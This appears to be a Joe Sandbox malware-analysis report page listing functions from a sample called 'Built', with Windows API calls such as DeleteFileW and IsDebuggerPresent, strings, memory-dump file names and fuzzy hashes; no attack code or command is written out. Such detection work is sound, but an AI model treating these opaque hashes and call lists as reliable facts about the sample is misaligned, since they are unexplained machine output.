Function 00007FF76D5C81A0 Relevance: 1.5, APIs: 1, Instructions: 19libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF76D5C86B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF76D5C3FA4,00000000,00007FF76D5C1925), ref: 00007FF76D5C86E9

LoadLibraryExW.KERNEL32(?,00007FF76D5C5C06,?,00007FF76D5C308E), ref: 00007FF76D5C81C2

Memory Dump Source

Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: ByteCharLibraryLoadMultiWide
String ID:
API String ID: 2592636585-0
Opcode ID: 99459516253cb9cb4854e4c73e6f2a87dddee0b16df49a4a0f63266b22594f97
Instruction ID: 4effe748868b8922675d2d9f8a30c6026713996656d5f0eb839c0dd0b088986c
Opcode Fuzzy Hash: 99459516253cb9cb4854e4c73e6f2a87dddee0b16df49a4a0f63266b22594f97
Instruction Fuzzy Hash: E4D08C11B2829181EA48BBA7AA4657995519B8EBC0F888034EE6C03B46EC3CC0800B14

Function 00007FF76D5DDEA8 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

HeapAlloc.KERNEL32(?,?,00000000,00007FF76D5DA63A,?,?,?,00007FF76D5D43FD,?,?,?,?,00007FF76D5D979A), ref: 00007FF76D5DDEFD

Memory Dump Source

Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: a50505f3dedbf875c6adc223253d20fad35851e197ada73c0c4444ee90b671f1
Instruction ID: 0dc7e60e3cb84121f66f2fc7a58aad7618ffb42e11caa45fe7b353c5592a7cc8
Opcode Fuzzy Hash: a50505f3dedbf875c6adc223253d20fad35851e197ada73c0c4444ee90b671f1
Instruction Fuzzy Hash: 40F04F55B2D347C0FE64766558313B5A2909F98B80FC84031CD1E86B87FD2CA4814634

Function 00007FF76D5DC90C Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

HeapAlloc.KERNEL32(?,?,?,00007FF76D5CFFB0,?,?,?,00007FF76D5D161A,?,?,?,?,?,00007FF76D5D2E09), ref: 00007FF76D5DC94A

Memory Dump Source

Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: b18cfb789f6bc806f768d700ed4d2a41d5d7e56d76a43a128583cd408f8141a4
Instruction ID: 93b2e833fcd6504b7b8eebb542a3306ea0106ff146cd5c7e8bd45f97efccf994
Opcode Fuzzy Hash: b18cfb789f6bc806f768d700ed4d2a41d5d7e56d76a43a128583cd408f8141a4
Instruction Fuzzy Hash: CAF0DA11E3D247C5FE547B61596127991805F4CBA0F884630ED3E45ACBFE6CB5418634

Non-executed Functions

Function 00007FFDF7593B10 Relevance: 25.2, Strings: 20, Instructions: 244COMMON

Download Yara Rule

Strings

gfff, xrefs: 00007FFDF7593C81
gfff, xrefs: 00007FFDF7593CA5
:, xrefs: 00007FFDF7593D4B
gfff, xrefs: 00007FFDF7593B71
gfff, xrefs: 00007FFDF7593DAA
gfff, xrefs: 00007FFDF7593CFB
gfff, xrefs: 00007FFDF7593BB7
gfff, xrefs: 00007FFDF7593BCF
gfff, xrefs: 00007FFDF7593D65
:, xrefs: 00007FFDF7593C56
-, xrefs: 00007FFDF7593C46
-, xrefs: 00007FFDF7593DFF
gfff, xrefs: 00007FFDF7593D2D
gfff, xrefs: 00007FFDF7593BED
gfff, xrefs: 00007FFDF7593D94
gfff, xrefs: 00007FFDF7593C4A
, xrefs: 00007FFDF7593C4F
gfff, xrefs: 00007FFDF7593CD7
-, xrefs: 00007FFDF7593B5C
gfff, xrefs: 00007FFDF7593C1F

Memory Dump Source

Source File: 00000003.00000002.2065249418.00007FFDF7591000.00000040.00000001.01000000.00000016.sdmp, Offset: 00007FFDF7590000, based on PE: true

Associated: 00000003.00000002.2065208085.00007FFDF7590000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 00000003.00000002.2065249418.00007FFDF76E2000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000003.00000002.2065249418.00007FFDF76E4000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000003.00000002.2065249418.00007FFDF76F9000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000003.00000002.2066155855.00007FFDF76FB000.00000080.00000001.01000000.00000016.sdmpDownload File
Associated: 00000003.00000002.2066216002.00007FFDF76FD000.00000004.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffdf7590000_Built.jbxd

Similarity

API ID:
String ID: $-$-$-$:$:$gfff$gfff$gfff$gfff$gfff$gfff$gfff$gfff$gfff$gfff$gfff$gfff$gfff$gfff
API String ID: 0-2549712616
Opcode ID: 353726e22626a36420e9d36d6d2fee7df0cbaefdbf38681664d95024bd46e1d7
Instruction ID: c80dfe3d00f8cc129d00af29388873a14000c23a4c598f025c658b4786e12e3e
Opcode Fuzzy Hash: 353726e22626a36420e9d36d6d2fee7df0cbaefdbf38681664d95024bd46e1d7
Instruction Fuzzy Hash: 0D812897B201948BF759C67EF822FDD1B9593A0348F444139EA40CFBC7E92EE6028742

Function 00007FFDF75BB870 Relevance: 14.4, APIs: 1, Strings: 7, Instructions: 427COMMON

Download Yara Rule

APIs

00007FFE133019C0.VCRUNTIME140 ref: 00007FFDF75BB976

Strings

Page %d is never used, xrefs: 00007FFDF75BBC1B
incremental_vacuum enabled with a max rootpage of zero, xrefs: 00007FFDF75BBA6D
Main freelist: , xrefs: 00007FFDF75BB9C7
Bad ptr map entry key=%d expected=(%d,%d) got=(%d,%d), xrefs: 00007FFDF75BBB2D
Failed to read ptrmap key=%d, xrefs: 00007FFDF75BBB06
max rootpage (%d) disagrees with header (%d), xrefs: 00007FFDF75BBA49
Pointer map page %d is referenced, xrefs: 00007FFDF75BBC88

Memory Dump Source

Source File: 00000003.00000002.2065249418.00007FFDF7591000.00000040.00000001.01000000.00000016.sdmp, Offset: 00007FFDF7590000, based on PE: true

Associated: 00000003.00000002.2065208085.00007FFDF7590000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 00000003.00000002.2065249418.00007FFDF76E2000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000003.00000002.2065249418.00007FFDF76E4000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000003.00000002.2065249418.00007FFDF76F9000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000003.00000002.2066155855.00007FFDF76FB000.00000080.00000001.01000000.00000016.sdmpDownload File
Associated: 00000003.00000002.2066216002.00007FFDF76FD000.00000004.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffdf7590000_Built.jbxd

Similarity

API ID: 00007E133019
String ID: Bad ptr map entry key=%d expected=(%d,%d) got=(%d,%d)$Failed to read ptrmap key=%d$Main freelist: $Page %d is never used$Pointer map page %d is referenced$incremental_vacuum enabled with a max rootpage of zero$max rootpage (%d) disagrees with header (%d)
API String ID: 3999650332-2103957143
Opcode ID: d124005af4a007284df854872ffb4612a4a600e5c771297b311b7b1fef60c5b7
Instruction ID: 0962f85053b1dd1696b25ea1fc13c7d1628a12ea0d68329b430896c4f4be948a
Opcode Fuzzy Hash: d124005af4a007284df854872ffb4612a4a600e5c771297b311b7b1fef60c5b7
Instruction Fuzzy Hash: A6127C3AB086428AEB56CB69D464AFD77A1FB44744F14013ADA6D47BE8CFBCE445C700

Function 00007FF76D5C79B0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 89fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,00007FF76D5C7EF9,00007FF76D5C39E6), ref: 00007FF76D5C7A1B
RemoveDirectoryW.KERNEL32(?,00007FF76D5C7EF9,00007FF76D5C39E6), ref: 00007FF76D5C7A9E
DeleteFileW.KERNEL32(?,00007FF76D5C7EF9,00007FF76D5C39E6), ref: 00007FF76D5C7ABD
FindNextFileW.KERNEL32(?,00007FF76D5C7EF9,00007FF76D5C39E6), ref: 00007FF76D5C7ACB
FindClose.KERNEL32(?,00007FF76D5C7EF9,00007FF76D5C39E6), ref: 00007FF76D5C7ADC
RemoveDirectoryW.KERNEL32(?,00007FF76D5C7EF9,00007FF76D5C39E6), ref: 00007FF76D5C7AE5

Strings

[oV116, xrefs: 00007FF76D5C79CD
%s\*, xrefs: 00007FF76D5C79E2

Memory Dump Source

Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
String ID: %s\*$[oV116
API String ID: 1057558799-4178782411
Opcode ID: 37c75c647de740c4d03e434983ba542f23ef98c0d39288f6f50529afbb256bed
Instruction ID: 4d27f3747f592dbf4448ab11a96f07e34a2859e872720d56c8b21394b52ae8b4
Opcode Fuzzy Hash: 37c75c647de740c4d03e434983ba542f23ef98c0d39288f6f50529afbb256bed
Instruction Fuzzy Hash: 06416321E2CA42D5EB30BB24E8445B9A361FB98754FC40636DD5D42E96FF3CD64A8B30

Function 00007FFDF7596902 Relevance: 12.7, APIs: 2, Strings: 5, Instructions: 488COMMON

Download Yara Rule

APIs

00007FFE133019C0.VCRUNTIME140 ref: 00007FFDF7596CA6

Strings

gfff, xrefs: 00007FFDF7596D94
Inf, xrefs: 00007FFDF7596B61
0123456789ABCDEF0123456789abcdef, xrefs: 00007FFDF7596D48
NaN, xrefs: 00007FFDF7596A6F
VUUU, xrefs: 00007FFDF7596A08

Memory Dump Source

Source File: 00000003.00000002.2065249418.00007FFDF7591000.00000040.00000001.01000000.00000016.sdmp, Offset: 00007FFDF7590000, based on PE: true

Associated: 00000003.00000002.2065208085.00007FFDF7590000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 00000003.00000002.2065249418.00007FFDF76E2000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000003.00000002.2065249418.00007FFDF76E4000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000003.00000002.2065249418.00007FFDF76F9000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000003.00000002.2066155855.00007FFDF76FB000.00000080.00000001.01000000.00000016.sdmpDownload File
Associated: 00000003.00000002.2066216002.00007FFDF76FD000.00000004.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffdf7590000_Built.jbxd

Similarity

API ID: 00007E133019
String ID: 0123456789ABCDEF0123456789abcdef$Inf$NaN$VUUU$gfff
API String ID: 3999650332-2941899328
Opcode ID: 898b692f417f6eaa78e41c31c035a1fa3eb2f045bcc52f66fbfa8f3e2b7b8737
Instruction ID: 9f53e3ec35cf16454999d22a580a58ed884c07988ab6a419e943d80054baacb6
Opcode Fuzzy Hash: 898b692f417f6eaa78e41c31c035a1fa3eb2f045bcc52f66fbfa8f3e2b7b8737
Instruction Fuzzy Hash: 82125A26F1CA8685E7634A35C170AFA6BB2EF55388F054331DA9E537D9DF2CE4458300

Function 00007FF76D5E4F10 Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 334timeCOMMON

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00007FF76D5E4F55

Part of subcall function 00007FF76D5E48A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF76D5E48BC

Part of subcall function 00007FF76D5D9C58: HeapFree.KERNEL32(?,?,?,00007FF76D5E2032,?,?,?,00007FF76D5E206F,?,?,00000000,00007FF76D5E2535,?,?,?,00007FF76D5E2467), ref: 00007FF76D5D9C6E
Part of subcall function 00007FF76D5D9C58: GetLastError.KERNEL32(?,?,?,00007FF76D5E2032,?,?,?,00007FF76D5E206F,?,?,00000000,00007FF76D5E2535,?,?,?,00007FF76D5E2467), ref: 00007FF76D5D9C78

Part of subcall function 00007FF76D5D9C10: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF76D5D9BEF,?,?,?,?,?,00007FF76D5D9ADA), ref: 00007FF76D5D9C19
Part of subcall function 00007FF76D5D9C10: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF76D5D9BEF,?,?,?,?,?,00007FF76D5D9ADA), ref: 00007FF76D5D9C3E

_get_daylight.LIBCMT ref: 00007FF76D5E4F44

Part of subcall function 00007FF76D5E4908: _invalid_parameter_noinfo.LIBCMT ref: 00007FF76D5E491C

_get_daylight.LIBCMT ref: 00007FF76D5E51BA
_get_daylight.LIBCMT ref: 00007FF76D5E51CB
_get_daylight.LIBCMT ref: 00007FF76D5E51DC
GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF76D5E541C), ref: 00007FF76D5E5203

Strings

[oV116, xrefs: 00007FF76D5E5326

Memory Dump Source

Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
String ID: [oV116
API String ID: 4070488512-247592185
Opcode ID: 1e88bcb5f495bb70dc88d60703a9f776145871d29d9eb43ad6078281b4d73a6f
Instruction ID: de8003d49b5fee1363dccf334329b06382036a61e58d742a96b94429c9cbb468
Opcode Fuzzy Hash: 1e88bcb5f495bb70dc88d60703a9f776145871d29d9eb43ad6078281b4d73a6f
Instruction Fuzzy Hash: 9AD18C26E2C252C6E724BF26D8511B9A7A1EF88B84FC44135EE4D47A96FF3CE441C760

Function 00007FF76D5D9924 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00007FF76D5D999D
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF76D5D99B5
RtlVirtualUnwind.KERNEL32 ref: 00007FF76D5D99F0
IsDebuggerPresent.KERNEL32 ref: 00007FF76D5D9A29
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF76D5D9A33
UnhandledExceptionFilter.KERNEL32 ref: 00007FF76D5D9A3E

Strings

[oV116, xrefs: 00007FF76D5D9941

Memory Dump Source

Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID: [oV116
API String ID: 1239891234-247592185
Opcode ID: f336cc4ee628281f12481126c86b188c106f14650002c00baa1860decbda2c10
Instruction ID: ac4028a1de4663d90789a5a4f941f7ecf2165661c67e79deb3bba9e96551ecee
Opcode Fuzzy Hash: f336cc4ee628281f12481126c86b188c106f14650002c00baa1860decbda2c10
Instruction Fuzzy Hash: A9314F32628B81C5DB60EF25E8502AEB3A4FB88755F940139EE9D47B56EF38D145CB20

Function 00007FFDF716F660 Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 349COMMON

Download Yara Rule

APIs

00007FFE1FFB6570.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDF716F7EA
00007FFE1FFB6570.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDF716FA6C
00007FFE1FFB6570.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDF716FAA4

Strings

..\s\ssl\ssl_ciph.c, xrefs: 00007FFDF716FAE4, 00007FFDF716FB44
SECLEVEL=, xrefs: 00007FFDF716FA9D
STRENGTH, xrefs: 00007FFDF716FA62

Memory Dump Source

Source File: 00000003.00000002.2062027235.00007FFDF7151000.00000040.00000001.01000000.0000001B.sdmp, Offset: 00007FFDF7150000, based on PE: true

Associated: 00000003.00000002.2061936641.00007FFDF7150000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000003.00000002.2062027235.00007FFDF71C4000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000003.00000002.2062027235.00007FFDF71C6000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000003.00000002.2062027235.00007FFDF71E9000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000003.00000002.2062027235.00007FFDF71F4000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000003.00000002.2062027235.00007FFDF71FE000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000003.00000002.2063211798.00007FFDF7201000.00000080.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000003.00000002.2063253690.00007FFDF7203000.00000004.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffdf7150000_Built.jbxd

Similarity

API ID: 00007B6570
String ID: ..\s\ssl\ssl_ciph.c$SECLEVEL=$STRENGTH
API String ID: 4069847057-3120971754
Opcode ID: 0bb61a38e93cd422698bbbe6ad57663e905148832b226e3a331a90a2a185b23b
Instruction ID: 02e567feba5351c24ed6ad6c3d3c7d54c9831fba2192bf6de55ce601cead394e
Opcode Fuzzy Hash: 0bb61a38e93cd422698bbbe6ad57663e905148832b226e3a331a90a2a185b23b
Instruction Fuzzy Hash: 02E1D87BF0C24A46E7648E159860BBA77D9FB44B84F146035EAAD436D8DB3CE449CB00

Function 00007FF76D5E0B84 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 282COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF76D5E0BD0
FindFirstFileExW.KERNEL32 ref: 00007FF76D5E0CDA

Strings

[oV116, xrefs: 00007FF76D5E0BA3

Memory Dump Source

Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: FileFindFirst_invalid_parameter_noinfo
String ID: [oV116
API String ID: 2227656907-247592185
Opcode ID: 88c6eeb3815b689bec9e785de6a4435637107cd6a4a104e99c849aa3a7604df1
Instruction ID: dd639588ca415a33586a40ada6433f0ff477c77c3d87df152ecc0dfd81fe59c7
Opcode Fuzzy Hash: 88c6eeb3815b689bec9e785de6a4435637107cd6a4a104e99c849aa3a7604df1
Instruction Fuzzy Hash: D1B1B422B2C692C1EA60BB2A95101B9E391EB58BE4FC45132ED5D47FD6EF3CE441C720

Function 00007FF76D5CC44C Relevance: 10.6, APIs: 7, Instructions: 71COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FF76D5CC468
RtlCaptureContext.KERNEL32 ref: 00007FF76D5CC495
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF76D5CC4AF
RtlVirtualUnwind.KERNEL32 ref: 00007FF76D5CC4F0
IsDebuggerPresent.KERNEL32 ref: 00007FF76D5CC544
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF76D5CC561
UnhandledExceptionFilter.KERNEL32 ref: 00007FF76D5CC56C

Memory Dump Source

Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 59201671b846c18328c4c6cdbad1e823a2b0fec8eaed916d44c3dc4e1cb48f19
Instruction ID: 8d9d8a933923093185c47f1eb5d5062bc5fa43f7293ddd6cb9ae882ba88b93ca
Opcode Fuzzy Hash: 59201671b846c18328c4c6cdbad1e823a2b0fec8eaed916d44c3dc4e1cb48f19
Instruction Fuzzy Hash: EF312172618B81C5EB60AF60E8807FD7364FB48745F444039DA4D47B95EF38D548CB20

Function 00007FF76D5E518C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 143timeCOMMON

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00007FF76D5E51BA

Part of subcall function 00007FF76D5E4908: _invalid_parameter_noinfo.LIBCMT ref: 00007FF76D5E491C

_get_daylight.LIBCMT ref: 00007FF76D5E51CB

Part of subcall function 00007FF76D5E48A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF76D5E48BC

_get_daylight.LIBCMT ref: 00007FF76D5E51DC

Part of subcall function 00007FF76D5E48D8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF76D5E48EC

Part of subcall function 00007FF76D5D9C58: HeapFree.KERNEL32(?,?,?,00007FF76D5E2032,?,?,?,00007FF76D5E206F,?,?,00000000,00007FF76D5E2535,?,?,?,00007FF76D5E2467), ref: 00007FF76D5D9C6E
Part of subcall function 00007FF76D5D9C58: GetLastError.KERNEL32(?,?,?,00007FF76D5E2032,?,?,?,00007FF76D5E206F,?,?,00000000,00007FF76D5E2535,?,?,?,00007FF76D5E2467), ref: 00007FF76D5D9C78

GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF76D5E541C), ref: 00007FF76D5E5203

Strings

[oV116, xrefs: 00007FF76D5E5326

Memory Dump Source

Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
String ID: [oV116
API String ID: 3458911817-247592185
Opcode ID: c5508bc63ced89b7e96ce891f343e42cb1356f84bc391250f2f4d752248c7e40
Instruction ID: aa6c6b4cae37d3970b30fe50c24a69c96ebd3c86faf7b45a272d96d7fc422627
Opcode Fuzzy Hash: c5508bc63ced89b7e96ce891f343e42cb1356f84bc391250f2f4d752248c7e40
Instruction Fuzzy Hash: 67514B32E2C642C6E724FF21E9915B9A761AB4C784FC44539EE4D47A97EF3CE4408B60

Function 00007FFDF7151BE0 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 237COMMON

Download Yara Rule

APIs

00007FFE1FFB08A0.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FFDF71AD320

Strings

..\s\ssl\statem\statem_srvr.c, xrefs: 00007FFDF71AD145, 00007FFDF71AD1A6
resumption, xrefs: 00007FFDF71AD277

Memory Dump Source

Source File: 00000003.00000002.2062027235.00007FFDF7151000.00000040.00000001.01000000.0000001B.sdmp, Offset: 00007FFDF7150000, based on PE: true

Associated: 00000003.00000002.2061936641.00007FFDF7150000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000003.00000002.2062027235.00007FFDF71C4000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000003.00000002.2062027235.00007FFDF71C6000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000003.00000002.2062027235.00007FFDF71E9000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000003.00000002.2062027235.00007FFDF71F4000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000003.00000002.2062027235.00007FFDF71FE000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000003.00000002.2063211798.00007FFDF7201000.00000080.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000003.00000002.2063253690.00007FFDF7203000.00000004.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffdf7150000_Built.jbxd

Similarity

API ID: 00007
String ID: ..\s\ssl\statem\statem_srvr.c$resumption
API String ID: 3568877910-332775882
Opcode ID: 4ad2387cf5b43bbe971ed9e2d113b396eacd119982397ae11a6554e5567f7b71
Instruction ID: 05877cb0485bb372705ad27b384e0a0d2b1c86199cbcb19421eec3b9b274c90f
Opcode Fuzzy Hash: 4ad2387cf5b43bbe971ed9e2d113b396eacd119982397ae11a6554e5567f7b71
